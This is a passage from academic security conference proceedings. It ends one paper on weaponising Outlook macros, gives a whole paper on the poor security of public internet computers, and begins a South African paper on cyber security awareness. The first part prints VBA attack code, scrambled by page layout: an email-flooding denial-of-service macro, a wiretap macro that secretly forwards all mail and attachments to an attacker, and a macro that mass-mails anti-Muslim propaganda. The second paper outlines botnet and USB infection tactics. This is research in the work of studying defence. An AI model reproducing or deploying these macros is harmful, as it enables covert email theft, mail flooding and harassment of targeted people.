due date, we create infinity of emails with a subject, a body, and a specific address. Of course we delete
them all so that the user does not realize anything (secure deletion of any evidence to fool any forensics
attempt).
For the DOS to be effective, we have to infect thousands of different clients because every email on the
same customer is sent one after the other. Thus our attack targets one million customers, even more,
who will send themselves infinity of emails, every day from September 11 th on.
Our code is split into two parts, the initialization step and the payload. In the initialization part, there is an
error handling to avoid alerting the user, a variable definition and then the definition of the email object
type “Outlook.Application”. In the payload part, we have the recovery of the system date, the comparison
with the date that we fixed, and then the sending of emails. This macro will run whenever the Outook
application is launched (use of the “Application_Startup( )” mode.
Private Sub Application_Startup()
On Error Resume Next
Dim ol As New Outlook.Application
Dim olmail As MailItem
Dim i As Integer
Dim ActualDate As Date
' Object definition
Set ol = CreateObject("Outlook.Application")
ActualDate = Date
' If the date is September 11th or newer
If (ActualDate >= "11/09/2011") Then
While 1
' Mail definition
Set mail = ol.CreateItem(olMailItem)
' Mail creation
With olmail
.To = "email_address"
.Subject = "email_subject"
100

End If
End Sub
Wend
Eric Filiol et al.
.body = "email_body"
.DeleteAfterSubmit = True
.Send
End With
Set olmail = Nothing
Figure 3: eMail server Denial of Service (DoS)
101

4.2 Email wiretapping
Eric Filiol et al.
Here the attacker wants to access to the target user’s email in an illegitimate way (figure 4). First of all,
every email in the inbox as well as those sent by the victim is duplicated whenever Outlook is started up.
All those email copies can be saved as a txt file which remains invisible to the user. This text file (the
stolen emails) is then sent by email to the attacker’s email address. This part will be executed through the
“Application_StartUp( )” mode.
Whenever an email is sent or received by the victim, then a copy is sent to the attacker in a transparent
way (use of the “Application_ItemSend( )” and “Application_NewMail( )” modes).
Figure 4: eMail wiretapping
Here follows the source code of the attack (extract).
' Function launched when a mail is sended
Private Sub Application_ItemSend(ByVal Item As Object, Cancel As Boolean)
On Error Resume Next
i = 0
Sleep 1000
' For each mail in the Sended folder
For Each myItem In myInbox.Items
If i = 0 Then
Set myAttachments = myItem.Attachments
' Get all informations
body = "From: " & myItem.SenderName & _
" < " & myItem.SenderEmailAddress & " >" & Chr(13) _
& "Sended: " & myItem.SentOn & Chr(13) _
& "To: " & myItem.To & Chr(13) _
& "Cc: " & myItem.CC & Chr(13) _
& "Subject: " & myItem.Subject & Chr(13) & Chr(13) _
& myItem.body
' Get Attachments
If myAttachments.Count > 0 Then
102

End If
Next myItem
End Sub
End If
Eric Filiol et al.
'for all attachments do...
For j = 1 To myAttachments.Count
' save them to destination
myAttachments(j).SaveAsFile Folder_PJ_Sent & _
myAttachments(j).DisplayName
Next j
Set olmail = ol.CreateItem(olMailItem)
' Mail creation
With olmail
.To = "email_address"
.Subject = myItem.Subject
.body = body
If myAttachments.Count > 0 Then
.myAttachments.Add Folder_PJ_Received & _
myAttachments(j).DisplayName
End If
.DeleteAfterSubmit = True
.Send
End With
Set olmail = Nothing
' Set up the next mail
Set myItem = myItems.GetNext
i = i + 1
Sleep 1000
' Function launched when a mail is received
Private Sub Application_NewMail()
On Error Resume Next
i = 0
Sleep 1000
' For each mail in the Inbox folder
For Each myItem In myInbox.Items
If i = 0 Then
Set myAttachments = myItem.Attachments
i = i + 1
Sleep 1000
End If
Next myItem
End Sub
' Function launched when the application is launched
Private Sub Application_StartUp()
On Error Resume Next
i = 0
For Each myItem In myInbox.Items
Set myAttachments = myItem.Attachments
i = i + 1
Sleep 1000
Next myItem
i = 0
103

Eric Filiol et al.
For Each myItem2 In myInbox2.Items
Set myAttachments2 = myItem2.Attachments
i = i + 1
Sleep 1000
Next myItem2
End Sub
4.3 Propaganda and information operations
In this attack, we are going to send one thousands of propaganda emails whenever the user sends an
email. As an operational example, let us consider a US senior officer in Afghanistan. He uses emails to
keep in touch with his family. Once infected, whenever he sends an email, at the same time thousands of
emails are sent to Muslim citizens in an invisible way. These emails contain propaganda, anti-Muslim
contents…
Here follows the corresponding source code (extract):
Private Sub Application_ItemSend(ByVal Item As Object, Cancel As Boolean)
On Error Resume Next
Dim ol As New Outlook.Application
Dim olmail As MailItem
Dim i As Integer
Dim Tableau(1 To 1000) As String
Next i
End Sub
Tableau(1) = "email_address1"
' ...
Tableau(1000) = "email_address1000"
' Object definition
Set ol = CreateObject("Outlook.Application")
For i = 1 To 1000 Step 1
Set olmail = ol.CreateItem(olMailItem)
5. Conclusion
' Mail creation
With olmail
.To = Tableau(i)
.Subject = "email_subject"
.Body = "email_body"
.DeleteAfterSubmit = True
.Send
End With
Set olmail = Nothing
From this study, we could realize how it is ridiculously easy to infect a user’s computer and to exploit his
email client without him knowing it and how such unsophisticated cyber-attacks could inflict major
damage on the nations’ security: Propaganda, espionage, denial of service are some of the examples of
new threats that such basic attacks can carry out. One can imagine the interest of such tools in cyber
warfare to collect intelligence in support of terrorist operations and to communicate and disseminate
propaganda.
What is worrying is that the requisite level of knowledge and skills needed to implement this technique is
amazingly low while the nuisance potential of this kind of cyber attack is very high.
104

Eric Filiol et al.
The fact that such attacks can be launched by the man in the street and that the used cyber attack tools
are very common among the population, (emails and office documents) will inevitably increase the scope
and the scale of the attack. It will make attacks easy to launch and difficult to trace.
References
Adobe Developer Support (2008) Document management – Portable document format – Part 1: PDF 1.7,
http://www.adobe.com/content/dam/Adobe/en/devnet/pdf/pdfs/PDF32000_2008.pdf.
Adobe Developer Support (2007) Adobe Acrobat SDK 8.1 JavaScript for Acrobat API Reference for Microsoft
Windows and Mac OS, http://www.adobe.com/content/dam/Adobe/en/devnet/acrobat/pdfs/js_api_reference.
Blonce, A., Filiol and E., Frayssignes, L. (2008) Portable Document Format (PDF) Security Analysis and Malware
Threats, Black Hat, Europe, http://www.blackhat.com/presentations/bh-europe-08/Filiol/Presentation/bh-eu-08filiol.pdf.
Dechaux, J., Filiol, E. and Fizaine, J.P. (2010) Office documents: New Weapons of Cyberwarfare, Hack.Lu,
Luxembourg, http://archive.hack.lu/2010/Filiol-Office-Documents-New-Weapons-of-Cyberwarfare-paper.pdf.
Dechaux, J., Fizaine, J.P., Griveau, R. and Jaafar, K. (2010) New Trends in Malware Sample-Independent AV
Evaluation Techniques with Respect to Document Malware, Eicar 2010, France.
Filiol, E. (2007) Technique virales avancées, IRIS International Series, Springer Edition.
Saumil, S. (2010) Exploit Delivery, Hack.Lu, Luxembourg, http://archive.hack.lu/2010/Saumil-Exploit-Deliveryslides.pdf.
Stevens, D. (2010) Analyzing Malicious PDF Files, Hack.Lu, Luxembourg,
http://blog.didierstevens.com/2010/09/26/free-malicious-pdf-analysis-e-book.
105

The Computer Security of Public/Open Computer Spaces:
Feedback of a Field Study in Europe
Eric Filiol
ESIEA - Operational virology and cryptology laboratory, France
filiol@esiea.fr
https://sites.google.com/site/ericfiliol/
Abstract: Many public places offer free or low-paying accesses to the Internet network: Internet cafes, hotels
(especially high quality hotels). These places are experiencing a large attendance, especially near sites like railway
stations, airports, international conference lounge....A number of questions then arises regarding the computer
security aspects: what kind of users visit these places and use those internet accesses, what security risks do they
face and especially how ill-intentioned actors (terrorists, organized crime, spies ...) could use those accesses to
infringing users and possibly a company network. This article presents the results of a wide study conducted in
Europe during the second half of 2010 in these "public/open Internet places”. The report is alarming. Not only do
users take an enormous risk to themselves but seriously jeopardize their businesses. This study reveals indeed that
contrary to the popular belief – according to which most users of these sites are tourists or individuals only - the
majority of users of these sites are professionals, employees of large firms who moreover are the custodians of high
power or of high responsibility (CEO, CSO or CTO of large companies) or even of private data of third-party people
(lawyers, physicians...). Even worse, the lack of real security on all these Internet open-access can be exploited and
perverted – after a suitable and necessary intelligence phase -- to conduct cyber attacks against companies,
government offices and bodies, critical infrastructure...) thus causing an extreme prejudice.
Keywords: computer security, malware, intelligence gathering, computer network attack (CNA), computer network
operation (CNO), computer terrorism
1. Introduction
Many open/public computer spaces are freely available and offer a direct access to the Internet network:
Internet-cafes, Internet computer in hotels (especially top quality hotels), airport, railway station,
international conference lounges… In a context of an ever-growing need for security and control,
especially with respect to terrorist activities and economic intelligence (active and passive), then a
number of question arises:
What the overall security of those open computer spaces? It is possible to mount/launch national or
worldwide attacks in an untraceable and uncontrolled way?
As far as the security of companies is concerned, it is possible to target them easily and perform
active and passive economic intelligence operations and bypass all their (system and network)
security?
During six months, we have analyzed the security of many public/open computer spaces in Europe
(mainly France, Belgium, Luxembourg, Germany, Greece and The Netherlands; for a grand total of 247
computers analyzed) and tried to think as terrorists or spies would. As a general conclusion, we have
made the following dramatic review:
The overall security of those open/public spaces is extremely weak. No control is even performed to
monitor who is using the Internet facilities and what kind of actions is performed. Hence mounting
national or worldwide attacks through Internet is more than easy. In a context of terrorism, this can
have a dramatic impact.
A vast of majority of users is not simple users or innocent tourists but on the contrary they are
decision-makers, employees of large firms who moreover are the custodians of high power or of high
responsibility (CEO, CSO or CTO of large companies...) or even of private data of third-party people
(lawyers, physicians...). We have observed that most of the time they violate one or more (computer)
basic security rules both regarding the data security and their own company computer network.
Targeting one or more companies to perform intelligence operations against them, mount internal
attacks against their networks and computer resources while bypassing many of their protection is
very easy as well. In particular, we have observed that many decision-makers are using those public
spaces in a very unsecure way thus jeopardizing their company’s assets and existence.
In this paper, we present the detailed results of this field study with a lot of illustrative examples and
attack scenario we have tested or explored. We draw a number of recommendations towards more
security.
106

Eric Filiol
The paper is organized as follows. Section 2 will first present the context, the protocols and tools of our
study. Section 3 will report the level of (in) security we have observed. As a general conclusion, the
computer security level is very low. Section 4 will then address the issue of intelligence gathering in those
open/public computer spaces. We will show how much sensitive the data we have collected were.
Moreover, we will show how the data collected can be misused to prepare further targeted computer
attacks against companies. Section 5 will then explain how to exploit and to pervert the computer
(in)security in place to prepare and mount indirect computer attacks against remote and sensitive
computer facilities like those in critical infrastructure, protected company LAN... Section 6 will present an
overall scenario based on our different results to summarize most of our results. We will then conclude by
addressing the protection issues against that particular risk.
2. Context, protocol and tools of the study
2.1 The “theoretical” context
To evaluate the security risk, a number of Information Security Management Systems (ISMS) and
standards exist. Among them, the widely used are:
French Government EBIOS risk analysis method (DCSSI, 2000) which allows evaluating and acting
on risks relative to information systems security, and proposes a security policy adapted to the needs
of an organization. The five steps of the EBIOS method are circumstantial study, security
requirements, risk study, identification of security goals, and determination of security requirements.
The “ISO27k” (ISO/IEC 27000-series, ) standards which provide good practice guidance on
designing, implementing and auditing Information Security Management Systems to protect the
confidentiality, integrity and availability of the information on which we all depend.
The main drawback and limitation with respect to those security and risk analysis methods lie in the fact
that their approach is far too much system/infrastructure centric. Moreover they consider only technical
aspects and the “intelligence” approach is not taken into account. The attacker’s vision and approaches
are never taken into account. More worryingly, the enlarged environment of the systems/infrastructures
analyzed - especially in its dynamic evolution - is almost never considered.
Our study aims at providing a different view. Our goal is to show that the attacker’s vision in a context of
intelligence operations, cyberwarfare preparation and planning has a tremendous impact on the overall
security.
2.2 Study protocol and tools
The purpose of this study, which has been conducted from May 2010 to November 2010, for the benefit
of the SECALYS Ltd 1 – a company specialized in business and economic intelligence -- was to determine
the factors and the risk level related to the use of Internet access in public areas and open (Internetcafes,
Internet computer in hotels, airport, railway station, international conference lounges…). The idea
was to stand in the shoes of an attacker (a spy, a mafia group member, a terrorist...) who wishes to
collect intelligence or targeting a particular company (industrial espionage, cyber attacks...). In particular,
the different approaches considered have been keeping in mind that the word "intelligence" contains two
main ideas: there is a passive component (the information gathering which consists in collecting more or
less sensitive data in more or less open environments) and an active and/or offensive component
(intrusion, compromise, attack, physical human operations ...). It is important to keep in mind this duality
of action is most of the time often forgotten in the buzz term of ``economic intelligence’’. Intelligence
techniques and operations do not care with Ethics, difficulty or any kind of limitations or regulations. It is
only considering efficiency and success (Qiao & Wang, 1999).
The level of the analyses and computer actions/operations that we have undertaken, tested or planned
(see hereafter) is about to level 3 on a scale of complexity ranging from 1 to 10. There are therefore
somewhat unsophisticated techniques, that can be easily performed by a large number of attackers
having rather limited knowledge in computer hacking and attacks (script kiddies, would-be spies working
for private intelligence companies...). Our study has shown that more sophisticated techniques are bound
to always succeed.
Alongside to a few home-made, custom dedicated auditing software (but equivalent one can be found
easily on the Internet), we have used a rather limited kit of tools:
1 http :// www.secalys.fr
107

A USB stick containing portable applications:
Eric Filiol
Efficient yet light antivirus software (CureIt 2 ). This tool has been chosen since aside a very good
detection rate, it is the most transparent one with respect to the system. So whenever another
security software (e.g. an alternative antivirus software), using CureIt does neither trigger any alert
nor cause system slowdown or instability.
Powerful, multi-format recovery software (deleted or formatted data). We have considered PhotoRec,
a free, open tool written by Christophe Grenier 3 which is the most powerful software ever written in
this category.
A hex editor (Filealyzer 4 ) with content analysis and interpretation capabilities.
A set of hardware keylogger (PS2, USB...).
To evaluate the offensive part, we analyzed the environment of computer security in place (nature and
versions of protection software installed, configuration settings...) and tested the efficiency of the possible
attacks by performing them in our laboratory with real malware (malware, shellcode, exploits...) on exact
clones of the real computers. However, to ensure the operational reality of those attacks in situ, we
actually realized data recovery steps and operations to access to administrator and system privileges.
Sensitive data have been deleted after the study.
In each place, where a large number of computer ware available (like in cyber cafes), we analyzed a
random subset of those computers (and not only a single one) and thus have a more operational point of
view (using sampling technique).
For a few computers that have proved to be interesting with regards to the data collected or the frequent
regular users, we installed alternative antivirus software (e.g. Dr Web) in dynamic mode (after
deactivating the one in place, if any). It would have been possible to install other malware (key logger
software, Trojan horses) similarly ... We then returned to analyze the test results at different time
intervals.
We sought to evaluate the following points:
First, can we recover data (still present or deleted) from previous users’ sessions? Can these data be
sensitive or confidential (in other words, are those computers used mainly for professional purposes
or not)? What is the level of sensitiveness of the date collected or recovered?
How secure are these open Internet computers (antivirus, configuration of hidden areas, system
directory accessible or not...)? In other words, can we carry out attacks from those computers and
even worse, can we ``reconfigure/change” them in such a way we can target, infect and spy users
who use the computer after we did?
For this last point (offensive and targeted action against a given user/company), it is worth stressing on
the fact that a necessary, human classical intelligence analysis must be performed to optimize this step.
This particular point is discussed in Section 5.
3. The actual computer security of open/public computer spaces
We observed a total lack of security in all computers we have analyzed. The few configurations and
security software in place absolutely do not protect these systems against attacker of low or medium
technical level. The systems are often equipped with an antivirus (about 75 % of computers are
protected) which is often invisible but ill configured: for instance we managed systematically to access
scan logs, or we could easily uninstall them or manipulate/change their configuration (iAWACS, 2009 &
2010). The overall distribution of the antivirus found on systems is given in Figure 1. The most important
point is that the degree of protection is inversely proportional to the percentage distribution of antivirus
products. In this respect, McAfee and Symantec are the less efficient products (iAWACS, 2009 & 2010)
while being the most widely installed.
In a significant number of instances, CureIt detected infections where the antivirus in place failed
(especially with respect to Conficker variants). It is also possible, by analyzing scan logs to determine
with great precision, what kind of antivirus protection is installed on users' corporate network (or is not
2 http://www.freedrweb.com/cureit/?lng=en
3 http://www.cgsecurity.org/wiki/PhotoRec_FR
4 http://www.safer-networking.org/fr/filealyzer/index.html
108

Eric Filiol
installed). For example, the analysis of the meta-data in Office documents showed that infected
documents were opened on a machine in a company LAN without being detected. All this information is
critical during the intelligence step to prepare a computer network operation (Filiol, 2009).
Where we have installed an alternative antivirus (on computers which are regularly used by the same
people; see Sections 4 and 5), we managed to infer other critical information about antivirus software in
place in their business or home computer. It is important to remember that home computing is the first
point of entry of attacks against a corporate network (Filiol, 2009).
Figure 1: Distribution of antivirus software installed in open/public Internet accesses (in %; total number
of computers analyzed with an antivirus installed = 186)
The global protection (security software, visibility and strength of the configuration in terms of security) is
bad or even almost non-existent. It is easy in many ways (without even using vulnerabilities or
sophisticated codes) to gain system privileges and then install malware that will infect the subsequent
users. Virtually no action is taken against the installation of key-logger hardware (it is even possible to
easily retrieve admin password which was played only partially played to stay in a strictly legal context;
for ethical reasons we will not give the method here). It follows that infecting users and their company
network, in an anonymous and untraceable way is more than easy. Launching an attack with malware
like Stuxnet or Conficker (and so falsely incriminate a country or a company) is very easy. Additionally we
have observed that launching portable applications (from a USB key) is also very easy.
4. Intelligence gathering operations in open/public computer spaces
Collecting (still present on the hard disk) or recovering (when erased) data from previous users’ session
is very easy, even when some technical measure has been taken (like invisible or hidden directories). We
were able to recover several gigabytes of data. What is astonishing is the sensitivity of the data found:
economic data (financial audits of groups or corporations, for example), political data (eg, a document of
the High Court of Justice of Europe, see Figure 2), legal data, private data (we found a complete set of
document enabling to steal and usurp identities: tax notices, passports, identity cards...) and even
sometimes confidential documents.
The analysis of metadata for these documents has resulted in the recovery of important technical
information. In some cases, former modifications in documents (e.g. PDF) can even be recovered since
they are kept hidden in the file. It is clear that many users are often professionals – more than originally
suspected -- with heavy responsibilities and decision making. From this point of view top luxury hotels
(4/5 stars), cyber cafes near train stations or airports are the most productive. The analysis of application
history (browsers, logs of applications or of the operating system itself...) can also collect a lot of
information.
109

Eric Filiol
Figure 2: Document of the High Court of Justice of Europe (Kononov vs Letonia).
5. Exploitation of open/public computer spaces insecurity
These open/public Internet places are also a tremendous threat insofar as they can easily be used to
launch attacks. In general, no control is made and access to computers is so completely anonymous. In
hotels or international conferences, we were able to connect often without being a customer. There is
often no login banner, or, if any, these banners are easy to get around: just go to the welcome desk of the
hotel and pretend to be a guest in the hotel and so get the suitable credentials. A step of social
engineering and traditional intelligence may also suffice.
In Internet cafes, the presence of CCTV is rare and when any, there is a suitable garment suffices to hide
one’s face (hood or cap) does not trigger any reaction. Hence launching a global attack type Confiker so
totally anonymous is worryingly easy. Conduct an attack against a country while falsely incriminating a
third-party country is something feasible in this context: just use the internet cafes of the country you want
to frame. We have even verified that it was even possible to install very well-known DoS software (Denial
of Service) like LOIC (Low Orbit Ion Canon) in an invisible and persistent way (e.g. without being
detected by any antivirus in place. The detection by the administer supervision or by automated network
security software occurred in a more or less long time (for our test we have attacked one of our server
which has been set up especially for this test). Thus, by carefully calibrating a DoS tool like LOIC and
carefully selecting a few Internet cafes, it is possible to plan and launch a distributed attack of relatively
large magnitude. But the most serious concern deals with the possibility of targeted attacks against
companies. We have observed very interesting things. Let us summarize the most significant ones.
Surprisingly users are warying more over WiFi connections - even when protected by crypto - that
over open/public Internet access computers. The wired connection is seen as a (misleading)
guarantee of security.
The second point concerns the habits of users. Many makers use the same hotels (because of
agreements between these hotels and their companies). It is therefore possible to study on an
ongoing basis over a long period of time. In the cyber cafes we found that users like to use always
the same computer (when available).
Finally, the lack of real security makes possible to install whatever malicious software you want and
take total control of all computers in a discreet way. It is so easy to turn all the computers in an
internet cafe into a mini-botnet. It is also possible to install software that systematically perform a full
image of any USB device connected (including empty spaces that are not so empty since it contains
deleted data).
It is also possible to setup a full network connection towards any remote server. Then the attacker
does no longer need to come back to the computers.
6. Summary scenario
In order to illustrate all this, let us consider the following scenario. It is fictional in appearance only. In
reality, he was inspired by what we observed during our study and laboratory tests. From this point, it is
particularly illustrative of what can be done.
110

6.1 The tactic theme
Eric Filiol
Let us suppose that the WorldLeaderInManyThings company – a non European industrial consortium --
wants to take control over its commercial competitor the EuropeanLeaderInOneThing company. The
latter is struggling to develop a high-technology product – called StarWay project-- in critical field for the
European community which wants to equip Europe with its own system and therefore gain its strategic
independence. Indeed, Europe is currently depending on the WorldLeaderInManyThings company’s
country for that technology.
EuropeanLeaderInOneThing’s engineers, its CEO and CTO are frequently visiting European entities
both in Brussels and Luxembourg. Upon failure on developing this sensitive technology, the company will
face major financial problems and is likely to look for industrial partnerships. They are always lodging in
the FourGoldenStar Hotel with which they have a commercial agreement.
The deadline to deliver the technology is the end of November 2010. Then the industrial development
must begin.
6.2 The course of events
In March 2010, a major one-week meeting in Brussels takes place with the European technical
supervisors of the StarWay Project and the EuropeanLeaderInOneThing’s engineer team and
executive staff. A number of critical issues are to be discussed.
At the beginning of April, the EuropeanLeaderInOneThing company suffers from a series of computer
problems that jeopardize the project: data loss, development servers’ failure and unavailability... More
worrying, the business press and later the general press in Europe spread the news according to which
the StarWay Project will have to suffer from major delays and tremendous cost overruns. As a
consequence, the EuropeanLeaderInOneThing company shares are suddenly down of nearly 30 %
over the April month. The CTO is dismissed. The European commission asks for a financial investigation
and a technical evaluation of the situation. Two months later, an official announcement is made by the
EC: the StarWay Project is moved back at least one year while an addition of 1.5 billion of euros to the
project budget has to be made. The EuropeanLeaderInOneThing company shares are immediately
plunging after the annoucement (40 % down more). The company CEO is dismissed. A major crisis is
about to strike the company. At the beginning of september, the WorldLeaderInManyThings company
makes a takeover bid over the EuropeanLeaderInOneThing company. The shareholders massively
accept and the takeover is a success. The European commission delayed the StarWay Project until
further notice.
6.3 Course of events analysis
In reality all those events and the final outcome result from multi-level, multi-step computer intelligence
and computer attacks by the WorldLeaderInManyThings company against the
EuropeanLeaderInOneThing company. Its aim was first to get rid of a commercial competitor
(commercial interest) and second to make sure that the StarWay Project is questioned (strategic interest
for its home country). For that purpose, it has hired a few intelligence experts and hackers. We will call
them the A-Team.
In a first intelligence step, the A-Team has analyzed the habits of the EuropeanLeaderInOneThing
company engineers and staff that regularly traveled and stay in Brussels and Luxembourg for the
StarWay Project. The A-team quickly noticed that they were regularly using the wire internet accesses in
the Hotel business lounge or in the cyber cafe near the bar and restaurant they frequented downtown.
Listening to their discussions, they determined that the EuropeanLeaderInOneThing company CSO
strongly forbade the use of wireless network. Taking control over the hotel and Internet cafe computers
the A-team first installed computer surveillance. Hence it has been possible to gain a precise insight of
the security in force in the EuropeanLeaderInOneThing company. The A-team manage to steal
passwords of EuropeanLeaderInOneThing company email accounts, to collect a lot of sensitive
information on their USB key (including deleted ones).
In a second step the attack against the EuropeanLeaderInOneThing company LAN network has been
initiated. USB keys used by their engineers and CTO have been infected with malware that could not be
detected by the antivirus in place). Infecting Word and PDF documents was sufficient. A few days later,
111

Eric Filiol
when pluging those USB keys to the LAN computers a sophisticated Trojan horse has been installed.
The malware was able to bypass all protection in place including DMZ and firewalls protection. Then
various attacks have been performed: StarWay Project data secure erasing, theft or manipulation
(insertion of wrong technical data), server failure... In parallel, taking control over the email boxes, the Ateam
organized the information leak and deception operations towards the press in such a way that it
seems to come from disappointed EuropeanLeaderInOneThing company employees. The end of the
story was nothing but logical.
7. Conclusion
This scenario will probably appear artificial and exagerated. In fact it is not. This attack has been possible
since (too) many critical mistakes have been made by the EuropeanLeaderInOneThing company. The
false sense of security given by ``antivirus able to detect 100% of known and unknown malware’’, by
wired Internet connections... generally play against the users. But in this case – as in many others – this
attack has been possible due to a total lack of intelligence methods. Generally, users think that computer
security is just a technical matter. It is not. It is only the very final end of a very long chain.
Critical employees of companies (engineers, CTO, CSO, CEO...) should be instructed with the
aggressive methods that any of his competitors could or will use. They have to think in the same way that
the attacker will. Otherwise they are dead. The use of open/public Internet access represents a maximum
danger. No professional use should be allowed.
More generally standards and security/risk analysis methods should evolve to take the new forthcoming
challenges with respect to system and network security. The attacker’s mind and techniques, as well as
the intelligence operations techniques should also enlarge our vision of what the security of critical
systems and infrastructures really is. It is finally no longer possible to defend and protect without being
aware how we can attack, destroy and pervert security.
References
DCSSI (2000) EBIOS : « Expression des Besoins et Identification des Objectifs de Sécurité »
http://www.ssi.gouv.fr/ebios
International Standard Organization. ISO/IEC 27000-series security standards. http://www.iso27001security.com/
Col. Qiao, L. and Wang X. (1999) “Unrestricted Warfare”. People Liberation Army. Litterature and Arts Publishing
House, Beijing. [online] http://www.terrorism.com/documents/TRC-Analysis/unrestricted.pdf
Filiol E. (2009). Operational aspects of cyberwarfare or cyber-terrorist attacks: what a truly devastating attack could
do. Proceedings of the 8th European Conference on Information Warfare and Security (ECIW 2009), Lisbon,
Portugal, pp. 71—79.
iAWACS (2009) PWN2RM Challenge http://www.esiea-recherche.eu/iawacs_2009.html
iAWACS (2010) PWN2KILL Challenge http://www.esiea-recherche.eu/iawacs_2010.html
Dechaux J., Filiol E. and Fizaine J.-P. (2011). Perverting emails: a new dimention in Internet (in)security. To appear
in Proceedings of the 10th European Conference on Information Warfare and Security (ECIW 2011), Tallin,
Estonia, June 2011.
112

Evaluating Cyber Security Awareness in South Africa
Marthie Grobler 1 , Joey Jansen van Vuuren 1 and Jannie Zaaiman 2
1 Council for Scientific and Industrial Research, Pretoria, South Africa
2 University of Venda, South Africa
mgrobler1@csir.co.za
jjvvuuren@csir.co.za
jannie.zaaiman@univen.ac.za
Abstract: In many ways, the internet and cyber world is a dangerous place where innocent users can inadvertently
fall prey to shrewd cyber criminals. These dangers, combined with a large portion of the South African population that
has not had regular and sustained exposure to technology and broadband internet access, expose local communities
to cyber threats. Research done by the Council for Scientific and Industrial Research and the University of Venda
shows that these local communities are not empowered to deal with these threats. To prevent innocent internet users
from becoming victims of cyber attacks, an intensive awareness campaign is planned to educate novice internet and
technology users with regard to basic security. The motivation for this awareness project is to educate all South
Africans using the internet, in an attempt to strengthen the awareness level concerning the South African network - if
there are local communities that are not properly educated, their technology devices may remain unprotected. This
may leave the South African internet infrastructure vulnerable to attacks, posing a severe threat to national security.
In this specific project, national security will be promoted through awareness training focusing on the newly released
broadband capability and knowledge transfer within rural communities. To evaluate the current level of cyber security
awareness, a series of exploratory surveys have been distributed to less technologically resourced entities in rural
and deep rural communities within South Africa. By analysing the results of the surveys, it is possible to benchmark
the current level of awareness. These observations can then be extrapolated to the larger group of rural South
African communities. The next stage of the awareness evaluation project is to develop cyber security awareness
training modules for the local communities in their native tongue, aimed to improve the current level of awareness.
This paper discusses the preparation, evaluation and training of South African rural communities with regard to cyber
security awareness. Due to the networked nature of the internet, the level of awareness has an influencing impact on
the global community. Thus, to ensure a safely protected South African network, it is necessary to target the
communities that can inadvertently leave the network vulnerable.
Keywords: cyber security, awareness, rural communities, broadband, training, South Africa
1. Introduction
Cyber space is a complex environment that can advance individuals’ experience of electronic dependent
activities, but can also place these individuals and their respective nations in a vulnerable state. Cyber
space, cyber awareness and cyber security play an important role in the online experience of individuals,
and need to be addressed accordingly. The internet and cyber world is a dangerous place where
innocent users can inadvertently fall prey to shrewd cyber criminals. These dangers, combined with a
large portion of the South African population that has not had regular and sustained exposure to
technology and broadband internet access, expose local communities to cyber threats.
Research done by the Council for Scientific and Industrial Research (CSIR) and the University of Venda
shows that these local communities are not empowered to deal with these threats. To prevent innocent
internet users from becoming victims of cyber attacks, an intensive awareness campaign is needed to
educate novice internet and technology users with regard to basic security. The motivation for this
awareness project is to educate all South Africans using the internet, in an attempt to strengthen the
awareness level with regard to the South African network - if there are local communities that are not
properly educated, their technology devices may remain unprotected. This may leave the South African
internet infrastructure vulnerable to attacks, posing a severe threat to national security. In this specific
project, national security will be promoted through awareness training focusing on the newly released
broadband capability and knowledge transfer within rural communities.
2. The impact of broadband penetration on National Security
With the impending increase in broadband access in South Africa, an average citizen’s computer or
identity could in future be used (with or without knowledge and consent) as a hub for launching cyber
attacks on the rest of the world. The modern definition of national security includes human security, the
security of the individual as well as the average citizen (Phahlamohlaka, 2008). Africa as a continent
recently had an increase in broadband access from a previous 120 Gbps to 12 Tbps over two years.
Although the level of cyber attacks from the continent were very low, it could in future be used as a hub
113

Marthie Grobler et al.
for launching cyber warfare type attacks on the rest of the world. Research done by the United States’
Naval Warfare Command indicates that cyber developments moved the battlefield to the average
citizen’s home: attackers could take over a new computer within 30 seconds after first connection to the
internet (Jansen van Vuuren, Phahlamohlaka & Brazzoli, 2010).
This can have a dramatic impact on National Security. For example, there are some arguments that
South Africa’s strong ties with China could place the country at high risk of cyber war attacks (Stiennon,
2009). The generic National Security framework proposed by Jansen van Vuuren, Phahlamohlaka and
Brazzoli (2010) lists a number of cyber security threats to National Security due to the heightened
broadband access. These threats can be categorized as either natural determinants or social
determinants.
2.1 Natural determinants
Natural determinants are a causal factor influenced by the specific environment analysed.
Geography and resources contributes largely to the impact of broadband penetration in a specific
environment. For example, the shipment of outdated computers to Africa poses a security threat
since outdated software is vulnerable to attacks due to unavailability of updates. Taken into
consideration the 100 million computers in Africa the access will result in internet users and
especially individuals in rural communities being attacked regularly.
The population in a specific environment provides the extent to which broadband penetration can
have an impact – the bigger the population, the higher the potential broadband penetration. For
example, the occurrence of botnets may drastically increase if internet connectivity is higher, as with
high broadband access. This will result in armies of networked compromised computers in the homes
of many South Africans, posing serious threats to a country’s National Security.
2.2 Social determinants
Social determinants are a causal factor influenced by the groups and individuals in the specific
environment analysed.
The economy plays a motivator role in the impact of cyber threats. Recently South Africans
experienced several extensive scamming attacks, of which the most prominent the herding of
personal information using South Africa Revenue Service (SARS) and the fraudulent World Cup
offers supposedly from South African Airlines (SAA). Many people have already succumbed to these
fraudulent emails that gather their personal information. South African banks are also currently
experiencing an increase in banking fraud that directly poses a threat to individuals that may lose
their savings.
Politics has a direct influence on National Security. Accordingly, attacks on websites of the African
National Congress (ANC) - the ruling party in South Africa - with the aim of discrediting the party, or
the use of party member names to scam money from innocent citizens, resulted in embarrassment to
the party and a tumultuous political environment. A fraudulent email discussing a national strike in the
near future created uncertainty and could have created instability in the country.
The military is responsible for protecting a country’s National Security. Currently, many South
African citizens are not security savvy enough to thwart cyber attacks successfully, potentially leaving
the South African network compromised and open for attacks on a larger national scale.
Psychology can play a large role in the social aspects of cyber threats. For example, Distributed
Denial of Service (DDoS) attacks were already used to compromise websites and place
Psychological Operations (PsyOps) messages on compromised websites, as seen in the Georgia
attack in 2008. Recently, cell phones were also used to organise protests and influence citizens to
take part in a national strike that paralyzed Mozambique’s capital (AFP, 2010).
Information is paramount in any cyber threat. South Africa identified the need for Information
Communication and Technology (ICT) access to all its citizens that must be promoted on all levels of
the community and everybody must be exposed to the use and benefits of ICT. Along with increased
broadband access and connectivity by all its citizens, there are the possibilities of viruses that could
damage user’s computers and information. Malicious code can also be used to overwrite the infected
computer’s hard drive which could result in massive loss of data and information as experienced in
Korea with the DDoS attacks (Kebbs, 2009).
114

Marthie Grobler et al.
The results of this analysis indicated the necessity of security awareness in South Africa to combat these
cyber threats. Since both natural and social determinants are commonplace and both these determinants
potentially have a major effect on a country’s information infrastructure, it is necessary to consider the
broadband penetration when planning a cyber security awareness project.
2.3 Governments’ responsibility
In the light of existing international law doctrine a country may be considered responsible for acts
